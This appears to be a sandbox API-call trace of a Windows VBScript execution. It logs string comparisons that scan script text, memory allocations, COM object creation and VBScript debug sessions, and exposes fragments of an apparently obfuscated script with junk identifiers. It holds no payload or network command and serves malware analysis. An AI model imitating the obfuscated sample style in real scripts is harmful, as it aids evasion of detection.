	[0044.976] wcsncmp (_String1="\n\r\n\x09Function ", _String2="\r\n<signature>", _MaxCount=0xd) returned -3
	[0044.976] wcsncmp (_String1="\r\n\x09Function m", _String2="\r\n<signature>", _MaxCount=0xd) returned -51
	[0044.976] wcsncmp (_String1="\n\x09Function ma", _String2="\r\n<signature>", _MaxCount=0xd) returned -3
	[0044.976] wcsncmp (_String1="\x09Function mal", _String2="\r\n<signature>", _MaxCount=0xd) returned -4
	[0044.976] wcsncmp (_String1="Function malo", _String2="\r\n<signature>", _MaxCount=0xd) returned 57
	[0044.976] wcsncmp (_String1="unction malon", _String2="\r\n<signature>", _MaxCount=0xd) returned 104
	[0044.976] wcsncmp (_String1="nction maloni", _String2="\r\n<signature>", _MaxCount=0xd) returned 97
	[0044.976] wcsncmp (_String1="ction malonio", _String2="\r\n<signature>", _MaxCount=0xd) returned 86
	[0044.976] wcsncmp (_String1="tion malonios", _String2="\r\n<signature>", _MaxCount=0xd) returned 103
	[0044.976] wcsncmp (_String1="ion maloniosp", _String2="\r\n<signature>", _MaxCount=0xd) returned 92
	[0044.976] wcsncmp (_String1="on maloniospd", _String2="\r\n<signature>", _MaxCount=0xd) returned 98
	[0044.976] wcsncmp (_String1="n maloniospds", _String2="\r\n<signature>", _MaxCount=0xd) returned 97
	[0044.976] wcsncmp (_String1=" maloniospdsc", _String2="\r\n<signature>", _MaxCount=0xd) returned 19
	[0044.976] wcsncmp (_String1="maloniospdscn", _String2="\r\n<signature>", _MaxCount=0xd) returned 96
	[0044.976] wcsncmp (_String1="aloniospdscna", _String2="\r\n<signature>", _MaxCount=0xd) returned 84
	[0044.977] wcsncmp (_String1="loniospdscnac", _String2="\r\n<signature>", _MaxCount=0xd) returned 95
	[0044.977] wcsncmp (_String1="oniospdscnacc", _String2="\r\n<signature>", _MaxCount=0xd) returned 98
	[0044.977] wcsncmp (_String1="niospdscnacci", _String2="\r\n<signature>", _MaxCount=0xd) returned 97
	[0044.977] wcsncmp (_String1="iospdscnacci(", _String2="\r\n<signature>", _MaxCount=0xd) returned 92
	[0044.977] wcsncmp (_String1="ospdscnacci(c", _String2="\r\n<signature>", _MaxCount=0xd) returned 98
	[0044.977] wcsncmp (_String1="spdscnacci(cl", _String2="\r\n<signature>", _MaxCount=0xd) returned 102
	[0044.977] wcsncmp (_String1="pdscnacci(clo", _String2="\r\n<signature>", _MaxCount=0xd) returned 99
	[0044.977] wcsncmp (_String1="dscnacci(clou", _String2="\r\n<signature>", _MaxCount=0xd) returned 87
	[0044.977] wcsncmp (_String1="scnacci(cloud", _String2="\r\n<signature>", _MaxCount=0xd) returned 102
	[0044.977] wcsncmp (_String1="cnacci(clouds", _String2="\r\n<signature>", _MaxCount=0xd) returned 86
	[0044.977] wcsncmp (_String1="nacci(cloudss", _String2="\r\n<signature>", _MaxCount=0xd) returned 97
	[0044.977] wcsncmp (_String1="acci(cloudssd", _String2="\r\n<signature>", _MaxCount=0xd) returned 84
	[0044.977] wcsncmp (_String1="cci(cloudssds", _String2="\r\n<signature>", _MaxCount=0xd) returned 86
	[0044.977] wcsncmp (_String1="ci(cloudssdsO", _String2="\r\n<signature>", _MaxCount=0xd) returned 86
	[0044.977] wcsncmp (_String1="i(cloudssdsOS", _String2="\r\n<signature>", _MaxCount=0xd) returned 92
	[0044.977] wcsncmp (_String1="(cloudssdsOSo", _String2="\r\n<signature>", _MaxCount=0xd) returned 27
	[0044.977] wcsncmp (_String1="cloudssdsOSos", _String2="\r\n<signature>", _MaxCount=0xd) returned 86
	[0044.977] wcsncmp (_String1="loudssdsOSosA", _String2="\r\n<signature>", _MaxCount=0xd) returned 95
	[0044.977] wcsncmp (_String1="oudssdsOSosAT", _String2="\r\n<signature>", _MaxCount=0xd) returned 98
	[0044.977] wcsncmp (_String1="udssdsOSosATZ", _String2="\r\n<signature>", _MaxCount=0xd) returned 104
	[0044.977] wcsncmp (_String1="dssdsOSosATZZ", _String2="\r\n<signature>", _MaxCount=0xd) returned 87
	[0044.977] wcsncmp (_String1="ssdsOSosATZZP", _String2="\r\n<signature>", _MaxCount=0xd) returned 102
	[0044.977] wcsncmp (_String1="sdsOSosATZZPP", _String2="\r\n<signature>", _MaxCount=0xd) returned 102
	[0044.977] wcsncmp (_String1="dsOSosATZZPP)", _String2="\r\n<signature>", _MaxCount=0xd) returned 87
	[0044.977] wcsncmp (_String1="sOSosATZZPP)\r", _String2="\r\n<signature>", _MaxCount=0xd) returned 102
	[0044.977] wcsncmp (_String1="OSosATZZPP)\r\n", _String2="\r\n<signature>", _MaxCount=0xd) returned 66
	[0044.978] wcsncmp (_String1="SosATZZPP)\r\n\r", _String2="\r\n<signature>", _MaxCount=0xd) returned 70
	[0044.978] wcsncmp (_String1="osATZZPP)\r\n\r\n", _String2="\r\n<signature>", _MaxCount=0xd) returned 98
	[0044.978] wcsncmp (_String1="sATZZPP)\r\n\r\n\x09", _String2="\r\n<signature>", _MaxCount=0xd) returned 102
	[0044.978] wcsncmp (_String1="ATZZPP)\r\n\r\n\x09I", _String2="\r\n<signature>", _MaxCount=0xd) returned 52
	[0044.978] wcsncmp (_String1="TZZPP)\r\n\r\n\x09If", _String2="\r\n<signature>", _MaxCount=0xd) returned 71
	[0044.978] wcsncmp (_String1="ZZPP)\r\n\r\n\x09If ", _String2="\r\n<signature>", _MaxCount=0xd) returned 77
	[0044.978] wcsncmp (_String1="ZPP)\r\n\r\n\x09If c", _String2="\r\n<signature>", _MaxCount=0xd) returned 77
	[0044.978] wcsncmp (_String1="PP)\r\n\r\n\x09If cl", _String2="\r\n<signature>", _MaxCount=0xd) returned 67
	[0044.978] wcsncmp (_String1="P)\r\n\r\n\x09If clo", _String2="\r\n<signature>", _MaxCount=0xd) returned 67
	[0044.978] wcsncmp (_String1=")\r\n\r\n\x09If clou", _String2="\r\n<signature>", _MaxCount=0xd) returned 28
	[0044.978] wcsncmp (_String1="\r\n\r\n\x09If cloud", _String2="\r\n<signature>", _MaxCount=0xd) returned -47
	[0044.978] wcsncmp (_String1="\n\r\n\x09If clouds", _String2="\r\n<signature>", _MaxCount=0xd) returned -3
	[0044.978] wcsncmp (_String1="\r\n\x09If cloudss", _String2="\r\n<signature>", _MaxCount=0xd) returned -51
	[0044.978] wcsncmp (_String1="\n\x09If cloudssd", _String2="\r\n<signature>", _MaxCount=0xd) returned -3
	[0044.978] wcsncmp (_String1="\x09If cloudssds", _String2="\r\n<signature>", _MaxCount=0xd) returned -4
	[0044.978] wcsncmp (_String1="If cloudssdsO", _String2="\r\n<signature>", _MaxCount=0xd) returned 60
	[0044.978] wcsncmp (_String1="f cloudssdsOS", _String2="\r\n<signature>", _MaxCount=0xd) returned 89
	[0044.978] wcsncmp (_String1=" cloudssdsOSo", _String2="\r\n<signature>", _MaxCount=0xd) returned 19
	[0044.978] wcsncmp (_String1="cloudssdsOSos", _String2="\r\n<signature>", _MaxCount=0xd) returned 86
	[0044.978] wcsncmp (_String1="loudssdsOSosA", _String2="\r\n<signature>", _MaxCount=0xd) returned 95
	[0044.978] wcsncmp (_String1="oudssdsOSosAT", _String2="\r\n<signature>", _MaxCount=0xd) returned 98
	[0044.978] wcsncmp (_String1="udssdsOSosATZ", _String2="\r\n<signature>", _MaxCount=0xd) returned 104
	[0044.978] wcsncmp (_String1="dssdsOSosATZZ", _String2="\r\n<signature>", _MaxCount=0xd) returned 87
	[0044.978] wcsncmp (_String1="ssdsOSosATZZP", _String2="\r\n<signature>", _MaxCount=0xd) returned 102
	[0044.978] wcsncmp (_String1="sdsOSosATZZPP", _String2="\r\n<signature>", _MaxCount=0xd) returned 102
	[0044.978] wcsncmp (_String1="dsOSosATZZPP ", _String2="\r\n<signature>", _MaxCount=0xd) returned 87
	[0044.978] wcsncmp (_String1="sOSosATZZPP <", _String2="\r\n<signature>", _MaxCount=0xd) returned 102
	[0044.979] wcsncmp (_String1="OSosATZZPP < ", _String2="\r\n<signature>", _MaxCount=0xd) returned 66
	[0044.979] wcsncmp (_String1="SosATZZPP < 2", _String2="\r\n<signature>", _MaxCount=0xd) returned 70
	[0044.979] wcsncmp (_String1="osATZZPP < 2 ", _String2="\r\n<signature>", _MaxCount=0xd) returned 98
	[0044.979] wcsncmp (_String1="sATZZPP < 2 T", _String2="\r\n<signature>", _MaxCount=0xd) returned 102
	[0044.979] wcsncmp (_String1="ATZZPP < 2 Th", _String2="\r\n<signature>", _MaxCount=0xd) returned 52
	[0044.979] wcsncmp (_String1="TZZPP < 2 The", _String2="\r\n<signature>", _MaxCount=0xd) returned 71
	[0044.979] wcsncmp (_String1="ZZPP < 2 Then", _String2="\r\n<signature>", _MaxCount=0xd) returned 77
	[0044.979] wcsncmp (_String1="ZPP < 2 Then\r", _String2="\r\n<signature>", _MaxCount=0xd) returned 77
	[0044.979] wcsncmp (_String1="PP < 2 Then\r\n", _String2="\r\n<signature>", _MaxCount=0xd) returned 67
	[0044.979] wcsncmp (_String1="P < 2 Then\r\n\r", _String2="\r\n<signature>", _MaxCount=0xd) returned 67
	[0044.979] wcsncmp (_String1=" < 2 Then\r\n\r\n", _String2="\r\n<signature>", _MaxCount=0xd) returned 19
	[0044.979] wcsncmp (_String1="< 2 Then\r\n\r\n\x09", _String2="\r\n<signature>", _MaxCount=0xd) returned 47
	[0044.979] wcsncmp (_String1=" 2 Then\r\n\r\n\x09\x09", _String2="\r\n<signature>", _MaxCount=0xd) returned 19
	[0044.979] wcsncmp (_String1="2 Then\r\n\r\n\x09\x09m", _String2="\r\n<signature>", _MaxCount=0xd) returned 37
	[0044.979] wcsncmp (_String1=" Then\r\n\r\n\x09\x09ma", _String2="\r\n<signature>", _MaxCount=0xd) returned 19
	[0044.979] wcsncmp (_String1="Then\r\n\r\n\x09\x09mal", _String2="\r\n<signature>", _MaxCount=0xd) returned 71
	[0044.979] wcsncmp (_String1="hen\r\n\r\n\x09\x09malo", _String2="\r\n<signature>", _MaxCount=0xd) returned 91
	[0044.979] wcsncmp (_String1="en\r\n\r\n\x09\x09malon", _String2="\r\n<signature>", _MaxCount=0xd) returned 88
	[0044.979] wcsncmp (_String1="n\r\n\r\n\x09\x09maloni", _String2="\r\n<signature>", _MaxCount=0xd) returned 97
	[0044.979] wcsncmp (_String1="\r\n\r\n\x09\x09malonio", _String2="\r\n<signature>", _MaxCount=0xd) returned -47
	[0044.979] wcsncmp (_String1="\n\r\n\x09\x09malonios", _String2="\r\n<signature>", _MaxCount=0xd) returned -3
	[0044.979] wcsncmp (_String1="\r\n\x09\x09maloniosp", _String2="\r\n<signature>", _MaxCount=0xd) returned -51
	[0044.979] wcsncmp (_String1="\n\x09\x09maloniospd", _String2="\r\n<signature>", _MaxCount=0xd) returned -3
	[0044.979] wcsncmp (_String1="\x09\x09maloniospds", _String2="\r\n<signature>", _MaxCount=0xd) returned -4
	[0044.979] wcsncmp (_String1="\x09maloniospdsc", _String2="\r\n<signature>", _MaxCount=0xd) returned -4
	[0044.979] wcsncmp (_String1="maloniospdscn", _String2="\r\n<signature>", _MaxCount=0xd) returned 96
	[0044.980] wcsncmp (_String1="aloniospdscna", _String2="\r\n<signature>", _MaxCount=0xd) returned 84
	[0044.980] wcsncmp (_String1="loniospdscnac", _String2="\r\n<signature>", _MaxCount=0xd) returned 95
	[0044.980] wcsncmp (_String1="oniospdscnacc", _String2="\r\n<signature>", _MaxCount=0xd) returned 98
	[0044.980] wcsncmp (_String1="niospdscnacci", _String2="\r\n<signature>", _MaxCount=0xd) returned 97
	[0044.980] wcsncmp (_String1="iospdscnacci ", _String2="\r\n<signature>", _MaxCount=0xd) returned 92
	[0044.980] wcsncmp (_String1="ospdscnacci =", _String2="\r\n<signature>", _MaxCount=0xd) returned 98
	[0044.980] wcsncmp (_String1="spdscnacci = ", _String2="\r\n<signature>", _MaxCount=0xd) returned 102
	[0044.980] wcsncmp (_String1="pdscnacci = c", _String2="\r\n<signature>", _MaxCount=0xd) returned 99
	[0044.980] wcsncmp (_String1="dscnacci = cl", _String2="\r\n<signature>", _MaxCount=0xd) returned 87
	[0044.980] wcsncmp (_String1="scnacci = clo", _String2="\r\n<signature>", _MaxCount=0xd) returned 102
	[0044.980] wcsncmp (_String1="cnacci = clou", _String2="\r\n<signature>", _MaxCount=0xd) returned 86
	[0044.980] wcsncmp (_String1="nacci = cloud", _String2="\r\n<signature>", _MaxCount=0xd) returned 97
	[0044.980] wcsncmp (_String1="acci = clouds", _String2="\r\n<signature>", _MaxCount=0xd) returned 84
	[0044.980] wcsncmp (_String1="cci = cloudss", _String2="\r\n<signature>", _MaxCount=0xd) returned 86
	[0044.980] wcsncmp (_String1="ci = cloudssd", _String2="\r\n<signature>", _MaxCount=0xd) returned 86
	[0044.980] wcsncmp (_String1="i = cloudssds", _String2="\r\n<signature>", _MaxCount=0xd) returned 92
	[0044.980] wcsncmp (_String1=" = cloudssdsO", _String2="\r\n<signature>", _MaxCount=0xd) returned 19
	[0044.980] wcsncmp (_String1="= cloudssdsOS", _String2="\r\n<signature>", _MaxCount=0xd) returned 48
	[0044.980] wcsncmp (_String1=" cloudssdsOSo", _String2="\r\n<signature>", _MaxCount=0xd) returned 19
	[0044.980] wcsncmp (_String1="cloudssdsOSos", _String2="\r\n<signature>", _MaxCount=0xd) returned 86
	[0044.980] wcsncmp (_String1="loudssdsOSosA", _String2="\r\n<signature>", _MaxCount=0xd) returned 95
	[0044.980] wcsncmp (_String1="oudssdsOSosAT", _String2="\r\n<signature>", _MaxCount=0xd) returned 98
	[0044.980] wcsncmp (_String1="udssdsOSosATZ", _String2="\r\n<signature>", _MaxCount=0xd) returned 104
	[0044.980] wcsncmp (_String1="dssdsOSosATZZ", _String2="\r\n<signature>", _MaxCount=0xd) returned 87
	[0044.980] wcsncmp (_String1="ssdsOSosATZZP", _String2="\r\n<signature>", _MaxCount=0xd) returned 102
	[0044.981] SetLastError (dwErrCode=0xb) 
	[0044.981] GetLastError () returned 0xb
	[0044.981] SetLastError (dwErrCode=0xb) 
	[0044.982] ComputeAccessTokenFromCodeAuthzLevel () returned 0x1
	[0044.983] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0044.983] CloseCodeAuthzLevel () returned 0x1
	[0044.983] FreeLibrary (hLibModule=0x7feff550000) returned 1
	[0044.984] CoGetClassObject (in: rclsid=0x3f47f0*(Data1=0xb54f3741, Data2=0x5b07, Data3=0x11cf, Data4=([0]=0xa4, [1]=0xb0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4a, [6]=0x55, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef92e7270*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x26e6b8 | out: ppv=0x26e6b8*=0x3ff810) returned 0x0
	[0045.221] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26c990 | out: lpSystemTimeAsFileTime=0x26c990*(dwLowDateTime=0x1003b080, dwHighDateTime=0x1d5eb2b)) 
	[0045.221] GetCurrentProcessId () returned 0x998
	[0045.221] GetCurrentThreadId () returned 0x9a8
	[0045.221] GetTickCount () returned 0x1144a4a
	[0045.221] QueryPerformanceCounter (in: lpPerformanceCount=0x26c998 | out: lpPerformanceCount=0x26c998*=16573333157) returned 1
	[0045.222] malloc (_Size=0x100) returned 0x3cd2f0
	[0045.222] __dllonexit () returned 0x7fef90fbfc0
	[0045.222] __dllonexit () returned 0x7fef90fbfa8
	[0045.223] __dllonexit () returned 0x7fef90fbfd4
	[0045.227] GetUserDefaultLCID () returned 0x409
	[0045.227] GetVersion () returned 0x1db10106
	[0045.232] ??2@YAPEAX_K@Z () returned 0x3ff810
	[0045.233] ??2@YAPEAX_K@Z () returned 0x3cf220
	[0045.234] GetUserDefaultLCID () returned 0x409
	[0045.234] GetACP () returned 0x4e4
	[0045.234] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0045.234] ??2@YAPEAX_K@Z () returned 0x3ff810
	[0045.234] ??2@YAPEAX_K@Z () returned 0x3ff830
	[0045.234] ??2@YAPEAX_K@Z () returned 0x3cf5b0
	[0045.234] GetCurrentThreadId () returned 0x9a8
	[0045.234] ??2@YAPEAX_K@Z () returned 0x3cf5f0
	[0045.234] GetCurrentThreadId () returned 0x9a8
	[0045.234] ??2@YAPEAX_K@Z () returned 0x3cf6d0
	[0045.234] ??2@YAPEAX_K@Z () returned 0x3cf700
	[0045.234] ??2@YAPEAX_K@Z () returned 0x3cf740
	[0045.234] ??2@YAPEAX_K@Z () returned 0x3c7310
	[0045.235] GetCurrentThreadId () returned 0x9a8
	[0045.235] ??2@YAPEAX_K@Z () returned 0x3cf810
	[0045.235] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1
	[0045.235] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x26e640, cchData=6 | out: lpLCData="1252") returned 5
	[0045.235] IsValidCodePage (CodePage=0x4e4) returned 1
	[0045.236] LoadLibraryExA (lpLibFileName="ole32.dll", hFile=0x0, dwFlags=0x0) returned 0x7feff2a0000
	[0045.237] GetProcAddress (hModule=0x7feff2a0000, lpProcName="CoCreateInstance") returned 0x7feff2c7490
	[0045.237] CoCreateInstance (in: rclsid=0x7fef914d5a8*(Data1=0x6c736db1, Data2=0xbd94, Data3=0x11d0, Data4=([0]=0x8a, [1]=0x23, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xb5, [6]=0x8e, [7]=0x10)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fef914d5b8*(Data1=0x6c736dc1, Data2=0xab0d, Data3=0x11d0, Data4=([0]=0xa2, [1]=0xad, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x27, [7]=0xe8)), ppv=0x3cf568 | out: ppv=0x3cf568*=0x7ca10) returned 0x0
	[0045.237] IUnknown:AddRef (This=0x7ca10) returned 0x2
	[0045.237] GetCurrentProcessId () returned 0x998
	[0045.237] GetCurrentThreadId () returned 0x9a8
	[0045.237] GetTickCount () returned 0x1144a59
	[0045.238] ISystemDebugEventFire:BeginSession (This=0x7ca10, guidSourceID=0x7fef914d5d8, strSessionName="VBScript:00002456:00002472:18106969") returned 0x0
	[0045.238] GetCurrentThreadId () returned 0x9a8
	[0045.238] realloc (_Block=0x0, _Size=0xc8) returned 0x3cf8a0
	[0045.238] ??2@YAPEAX_K@Z () returned 0x3c7350
	[0045.238] malloc (_Size=0x1008) returned 0x3c82e0
	[0045.238] ??2@YAPEAX_K@Z () returned 0x3cf970
	[0045.238] malloc (_Size=0x400) returned 0x3cfb00
	[0045.239] malloc (_Size=0x108) returned 0x3cd400
	[0045.239] malloc (_Size=0x2008) returned 0x3c92f0
	[0045.239] malloc (_Size=0x208) returned 0x3cb300
	[0045.240] malloc (_Size=0x408) returned 0x3cb510
	[0045.240] malloc (_Size=0x808) returned 0x3cb920
	[0045.243] malloc (_Size=0x1008) returned 0x3ffce0
	[0045.246] malloc (_Size=0x2008) returned 0x400cf0
	[0045.251] malloc (_Size=0x4008) returned 0x402d00
	[0045.253] malloc (_Size=0x4008) returned 0x406d10
	[0045.254] malloc (_Size=0x4008) returned 0x40ad20
	[0045.255] realloc (_Block=0x3cfb00, _Size=0x800) returned 0x3cc130
	[0045.256] malloc (_Size=0x4008) returned 0x40ed30
	[0045.260] malloc (_Size=0x4008) returned 0x412d40
	[0045.264] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0045.264] malloc (_Size=0x320) returned 0x3cf970
	[0045.267] realloc (_Block=0x3cf970, _Size=0x4b0) returned 0x3cf970
	[0045.267] realloc (_Block=0x3cf970, _Size=0x708) returned 0x416d50
	[0045.268] realloc (_Block=0x416d50, _Size=0xa88) returned 0x416d50
	[0045.268] malloc (_Size=0x4008) returned 0x4177f0
	[0045.268] realloc (_Block=0x416d50, _Size=0xfc8) returned 0x41b800
	[0045.268] malloc (_Size=0xea68) returned 0x41c7d0
	[0045.270] ??2@YAPEAX_K@Z () returned 0x3cc940
	[0045.270] free (_Block=0x3c92f0) 
	[0045.270] free (_Block=0x3c82e0) 
	[0045.270] ??3@YAXPEAX@Z () returned 0x1000a0001
	[0045.270] free (_Block=0x3cc130) 
	[0045.270] free (_Block=0x41b800) 
	[0045.270] free (_Block=0x4177f0) 
	[0045.270] free (_Block=0x412d40) 
	[0045.271] free (_Block=0x40ed30) 
	[0045.271] free (_Block=0x40ad20) 
	[0045.271] free (_Block=0x406d10) 
	[0045.271] free (_Block=0x402d00) 
	[0045.271] free (_Block=0x400cf0) 
	[0045.272] free (_Block=0x3ffce0) 
	[0045.272] free (_Block=0x3cb920) 
	[0045.272] free (_Block=0x3cb510) 
	[0045.272] free (_Block=0x3cb300) 
	[0045.273] free (_Block=0x3cd400) 
	[0045.273] ??2@YAPEAX_K@Z () returned 0x3cc960
	[0045.273] ??2@YAPEAX_K@Z () returned 0x3cc9c0
	[0045.273] malloc (_Size=0x10) returned 0x3cc9f0
	[0045.273] free (_Block=0x3cf8a0) 
	[0045.274] GetUserDefaultLCID () returned 0x409
	[0045.274] GetACP () returned 0x4e4
	[0045.274] ??3@YAXPEAX@Z () returned 0x200060001
	[0045.274] ISystemDebugEventFire:EndSession (This=0x7ca10) returned 0x0
	[0045.274] IUnknown:Release (This=0x7ca10) returned 0x1
	[0045.274] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0045.274] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0045.274] IUnknown:Release (This=0x7ca10) returned 0x0
	[0045.274] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0045.274] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0045.274] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0045.274] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0045.274] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0045.274] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0045.274] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0045.275] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0045.275] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0045.275] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0045.275] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0045.275] free (_Block=0x3e92d0) 
	[0045.275] free (_Block=0x3e96e0) 
	[0045.275] free (_Block=0x3e90c0) 
	[0045.275] free (_Block=0x3e8fb0) 
	[0045.275] ??3@YAXPEAX@Z () returned 0x9201
	[0045.275] IUnknown:Release (This=0x7c0e0) returned 0x0
	[0045.275] free (_Block=0x3ddfd0) 
	[0045.275] ??3@YAXPEAX@Z () returned 0x9201
	[0045.275] IUnknown:Release (This=0x85530) returned 0x0
	[0045.275] ??2@YAPEAX_K@Z () returned 0x3ff830
	[0045.275] ??2@YAPEAX_K@Z () returned 0x3cf5b0
	[0045.275] ??2@YAPEAX_K@Z () returned 0x3cca10
	[0045.275] ??2@YAPEAX_K@Z () returned 0x3cca80
	[0045.275] ??2@YAPEAX_K@Z () returned 0x3f4680
	[0045.275] ??2@YAPEAX_K@Z () returned 0x3f46d0
	[0045.275] ??2@YAPEAX_K@Z () returned 0x3f4740
	[0045.276] ??2@YAPEAX_K@Z () returned 0x3cf740
	[0045.276] ??2@YAPEAX_K@Z () returned 0x3f47b0
	[0045.276] ??2@YAPEAX_K@Z () returned 0x3cf7b0
	[0045.276] GetUserDefaultLCID () returned 0x409
	[0045.276] GetACP () returned 0x4e4
	[0045.276] ??2@YAPEAX_K@Z () returned 0x3cfb40
	[0045.276] ??2@YAPEAX_K@Z () returned 0x3cfb70
	[0045.276] malloc (_Size=0x10) returned 0x3cf5d0
	[0045.276] ??2@YAPEAX_K@Z () returned 0x3cfbd0
	[0045.276] ??2@YAPEAX_K@Z () returned 0x3cfbf0
	[0045.276] ??2@YAPEAX_K@Z () returned 0x3c7310
	[0045.276] GetCurrentThreadId () returned 0x9a8
	[0045.276] ??2@YAPEAX_K@Z () returned 0x3cfc50
	[0045.276] ??2@YAPEAX_K@Z () returned 0x3c7350
	[0045.276] GetCurrentThreadId () returned 0x9a8
	[0045.277] ??2@YAPEAX_K@Z () returned 0x3cfd20
	[0045.277] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1
	[0045.277] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x26e9d0, cchData=6 | out: lpLCData="1252") returned 5
	[0045.277] IsValidCodePage (CodePage=0x4e4) returned 1
	[0045.277] CoCreateInstance (in: rclsid=0x7fef914d5a8*(Data1=0x6c736db1, Data2=0xbd94, Data3=0x11d0, Data4=([0]=0x8a, [1]=0x23, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xb5, [6]=0x8e, [7]=0x10)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fef914d5b8*(Data1=0x6c736dc1, Data2=0xab0d, Data3=0x11d0, Data4=([0]=0xa2, [1]=0xad, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x27, [7]=0xe8)), ppv=0x3cfaf8 | out: ppv=0x3cfaf8*=0x7c3f0) returned 0x0
	[0045.277] IUnknown:AddRef (This=0x7c3f0) returned 0x2
	[0045.277] GetCurrentProcessId () returned 0x998
	[0045.277] GetCurrentThreadId () returned 0x9a8
	[0045.277] GetTickCount () returned 0x1144a88
	[0045.277] ISystemDebugEventFire:BeginSession (This=0x7c3f0, guidSourceID=0x7fef914d5d8, strSessionName="VBScript:00002456:00002472:18107016") returned 0x0
	[0045.277] GetCurrentThreadId () returned 0x9a8
	[0045.277] ??2@YAPEAX_K@Z () returned 0x3cfdb0
	[0045.277] ??2@YAPEAX_K@Z () returned 0x3cfe00
	[0045.277] malloc (_Size=0x80) returned 0x3cff00
	[0045.277] malloc (_Size=0x108) returned 0x3cd400
	[0045.278] IUnknown:AddRef (This=0x3cca10) returned 0x5
	[0045.278] ??2@YAPEAX_K@Z () returned 0x3cff90
	[0045.278] GetCurrentThreadId () returned 0x9a8
	[0045.278] ??2@YAPEAX_K@Z () returned 0x42b240
	[0045.278] GetCurrentThreadId () returned 0x9a8
	[0045.278] ??2@YAPEAX_K@Z () returned 0x42b290
	[0045.278] GetCurrentThreadId () returned 0x9a8
	[0045.278] lstrlenW (lpString="WScript") returned 7
	[0045.278] lstrlenW (lpString="WScript") returned 7
	[0045.278] ??2@YAPEAX_K@Z () returned 0x42b2e0
	[0045.278] GetCurrentThreadId () returned 0x9a8
	[0045.279] ??2@YAPEAX_K@Z () returned 0x42b350
	[0045.279] lstrlenW (lpString="WSH") returned 3
	[0045.279] lstrlenW (lpString="WScript") returned 7
	[0045.279] lstrlenW (lpString="WSH") returned 3
	[0045.279] lstrlenW (lpString="WSH") returned 3
	[0045.279] ??2@YAPEAX_K@Z () returned 0x42b3a0
	[0045.279] GetCurrentThreadId () returned 0x9a8
	[0045.279] ??2@YAPEAX_K@Z () returned 0x42b400
	[0045.279] malloc (_Size=0x208) returned 0x42b450
	[0045.279] ??2@YAPEAX_K@Z () returned 0x3cffb0
	[0045.279] ??2@YAPEAX_K@Z () returned 0x42b660
	[0045.279] ??2@YAPEAX_K@Z () returned 0x42b680
	[0045.279] ISystemDebugEventFire:IsActive (This=0x7c3f0) returned 0x1
	[0045.281] malloc (_Size=0x988) returned 0x42b6d0
	[0045.281] GetCurrentThreadId () returned 0x9a8
	[0045.281] ??2@YAPEAX_K@Z () returned 0x42c060
	[0045.281] GetCurrentThreadId () returned 0x9a8
	[0045.281] ??2@YAPEAX_K@Z () returned 0x42c0b0
	[0045.281] GetCurrentThreadId () returned 0x9a8
	[0045.282] ??2@YAPEAX_K@Z () returned 0x42c100
	[0045.282] GetCurrentThreadId () returned 0x9a8
	[0045.282] ??2@YAPEAX_K@Z () returned 0x42c150
	[0045.282] GetCurrentThreadId () returned 0x9a8
	[0045.282] ??2@YAPEAX_K@Z () returned 0x42c1a0
	[0045.282] GetCurrentThreadId () returned 0x9a8
	[0045.282] malloc (_Size=0x408) returned 0x42c1f0
	[0045.282] ??2@YAPEAX_K@Z () returned 0x42c600
	[0045.282] GetCurrentThreadId () returned 0x9a8
	[0045.282] ??2@YAPEAX_K@Z () returned 0x42c650
	[0045.282] GetCurrentThreadId () returned 0x9a8
	[0045.282] ??2@YAPEAX_K@Z () returned 0x42c6d0
	[0045.283] GetCurrentThreadId () returned 0x9a8
	[0045.283] ??2@YAPEAX_K@Z () returned 0x42c720
	[0045.283] GetCurrentThreadId () returned 0x9a8
	[0045.283] ??2@YAPEAX_K@Z () returned 0x42c770
	[0045.283] GetCurrentThreadId () returned 0x9a8
	[0045.283] ??2@YAPEAX_K@Z () returned 0x42c7c0
	[0045.283] GetCurrentThreadId () returned 0x9a8
	[0045.283] ??2@YAPEAX_K@Z () returned 0x42c810
	[0045.283] GetCurrentThreadId () returned 0x9a8
	[0045.283] ??2@YAPEAX_K@Z () returned 0x42c860
	[0045.283] GetCurrentThreadId () returned 0x9a8
	[0045.284] GetCurrentThreadId () returned 0x9a8
	[0045.284] GetCurrentThreadId () returned 0x9a8
	[0045.284] malloc (_Size=0x808) returned 0x42d6a0
	[0045.284] GetCurrentThreadId () returned 0x9a8
	[0045.284] GetCurrentThreadId () returned 0x9a8
	[0045.284] GetCurrentThreadId () returned 0x9a8
	[0045.284] GetCurrentThreadId () returned 0x9a8
	[0045.284] GetCurrentThreadId () returned 0x9a8
	[0045.284] GetCurrentThreadId () returned 0x9a8
	[0045.284] realloc (_Block=0x0, _Size=0x140) returned 0x42deb0
	[0045.284] GetCurrentThreadId () returned 0x9a8
	[0045.284] GetCurrentThreadId () returned 0x9a8
	[0045.285] GetCurrentThreadId () returned 0x9a8
